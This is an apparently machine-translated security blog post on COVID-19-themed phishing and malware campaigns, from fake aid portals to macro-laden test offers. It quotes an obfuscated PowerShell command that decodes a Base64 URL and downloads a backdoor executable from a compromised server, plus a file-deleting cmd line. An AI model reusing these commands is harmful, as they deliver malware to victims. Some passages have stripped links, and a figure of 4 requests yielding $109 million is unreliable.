Attackers continue to exploit the topic of COVID-19, creating more and more new threats for users who are keenly interested in everything related to the epidemic. IN we have already talked about what types of malware have appeared in the wake of the coronavirus, and today we will talk about social engineering techniques that users have already encountered in different countries, including Russia. General trends and examples are under the cut.
Remember in did we talk about the fact that people willingly read not only about the coronavirus and the course of the epidemic, but also about financial support measures? Here is a good example. A curious phishing attack has been discovered in the German state of North Rhine-Westphalia (North Rhine-Westphalia or NRW). The attackers created copies of the website of the Ministry of Economy (), where anyone can apply for financial assistance. Such a program really exists, and it turned out to be in the hands of scammers. Having received the personal data of their victims, they made an application already on the real website of the ministry, but indicated other bank details. According to official figures, 4 such fake requests were made before the scheme was exposed. As a result, $109 million intended for affected citizens fell into the hands of fraudsters.
Would you like a free COVID-19 test?
Another prominent example of coronavirus-themed phishing was in emails. The messages attracted the attention of users with an offer to undergo free testing for coronavirus infection. In the attachment of these there were instances of Trickbot/Qakbot/Qbot. And when those who wanted to check their health proceeded to “fill out the attached form”, a malicious script was downloaded to the computer. And in order to avoid sandboxing, the script started downloading the main virus only after a while, when the protection systems were convinced that no malicious activity was taking place.
Convincing most users to enable macros was also easy. To do this, a standard trick was used when, in order to fill out a questionnaire, you must first enable macros, which means running a VBA script.
As you can see, the VBA script is specially masked from antiviruses.
Windows has a wait feature where an application waits /T <seconds> before accepting a "Yes" response by default. In our case, the script waited 65 seconds before deleting temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
While waiting, malware was being downloaded. To do this, a special PowerShell script was run:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
After decoding the Base64 value, the PowerShell script downloads a backdoor located on a previously hacked web server from Germany:
http://automatischer-staubsauger.com/feature/777777.pngand save it under the name:
C:UsersPublictmpdirfile1.exe
Folder ‘C:UsersPublictmpdir’ is deleted when the file 'tmps1.bat' is run, which contains the command cmd /c mkdir ""C:UsersPublictmpdir"".
Targeted attack on state structures
In addition, FireEye analysts recently reported on a targeted APT32 attack aimed at government structures in Wuhan, as well as the Chinese Ministry of Emergency Management. One of the RTFs distributed included a link to a New York Times article titled . However, when it was read, malware was downloaded (FireEye analysts identified the instance as METALJACK).
Interestingly, at the time of discovery, none of the antiviruses detected this instance, according to Virustotal.
When official sites are down
The clearest example of a phishing attack happened in Russia just the other day. The reason for this was the appointment of a long-awaited allowance for children aged 3 to 16 years. When the start of accepting applications was announced on May 12, 2020, millions rushed to the Gosuslugi website for long-awaited help and brought down the portal no worse than a professional DDoS attack. When the president said that “Government Services failed to cope with the flow of applications,” the network started talking about the fact that an alternative site for accepting applications had been launched.
The problem is that several sites have started working at once, and while one, the real one at posobie16.gosuslugi.ru, really accepts applications, yet .
Colleagues from SearchInform found about 30 new fraudulent domains in the .ru zone. Infosecurity a Softline Company has tracked more than 70 similar fake government services sites since the beginning of April. Their creators manipulate the usual symbols, and also use combinations of the words gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie, and so on.
Hype and social engineering
All these examples only confirm that attackers are successfully monetizing the coronavirus theme. And the higher the social tension and the more unclear issues, the more likely scammers are to steal important data, make people hand over their money on their own, or simply hack more computers.
And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal, but also corporate data are at risk. For example, users of Microsoft 365 (formerly Office 365) were also recently phished. People massively received voice “missed” messages in attachments to letters. However, in fact, the files were an HTML page that sent the victims of the attack to . As a result, access is lost and all data from the account is compromised.
Source: habr.com